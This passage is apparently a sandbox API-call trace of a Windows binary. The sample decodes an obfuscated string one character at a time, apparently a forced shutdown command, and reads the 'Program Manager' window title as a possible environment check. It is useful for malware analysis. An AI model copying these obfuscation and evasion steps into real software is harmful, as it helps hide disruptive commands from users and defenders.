pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.158] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0182.158] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.159] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0182.159] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.160] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0182.160] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.161] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0182.163] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.163] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.164] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.164] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0182.165] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.165] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.165] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0182.165] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.166] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0182.166] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.167] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0182.167] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.168] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.168] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.169] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.169] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.170] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0182.170] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.171] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.171] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.172] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.172] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.173] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0182.173] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.173] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.174] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.174] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0182.175] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.175] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.176] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.176] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0182.177] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.224] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.225] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.225] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0182.226] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.226] GetForegroundWindow () returned 0x20086 [0182.226] GetLastError () returned 0x0 [0182.226] SysStringLen (param_1=" ") returned 0xff [0182.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0182.227] SysStringLen (param_1=" ") returned 0xff [0182.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0182.227] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0182.227] GetLastError () returned 0x0 [0182.227] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0182.227] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0182.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0182.228] SysStringLen (param_1="Prog") returned 0x4 [0182.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Prog", cchWideChar=5, lpMultiByteStr=0x1150ca4, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Prog", lpUsedDefaultChar=0x0) returned 5 [0182.228] SetWindowTextA (hWnd=0x103c4, lpString="Prog") returned 1 [0182.228] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0182.229] GetFocus () returned 0x0 [0182.229] lstrlenA (lpString="Prog") returned 4 [0182.229] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x1150ca4) returned 0x1 [0182.229] IsWindow (hWnd=0x103c4) returned 1 [0182.229] IsWindow (hWnd=0x103c4) returned 1 [0182.230] IsWindow (hWnd=0x103c4) returned 1 [0182.230] IsWindow (hWnd=0x103c4) returned 1 [0182.230] GetFocus () returned 0x0 [0182.230] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0182.231] GetFocus () returned 0x0 [0182.231] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x5) returned 0x10ebcd0 [0182.231] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x5, lParam=0x10ebcd0) returned 0x4 [0182.231] GetFocus () returned 0x0 [0182.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0182.231] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Prog", cbMultiByte=-1, lpWideCharStr=0x1150ca4, cchWideChar=5 | out: lpWideCharStr="Prog") returned 5 [0182.231] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0182.231] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0182.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.233] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0182.233] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.233] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0182.234] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.234] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0182.235] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.235] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.236] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.237] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.237] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0182.237] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.238] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0182.238] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.238] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0182.239] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.240] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.240] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0182.240] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.241] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0182.241] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0182.242] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0182.242] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0182.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", 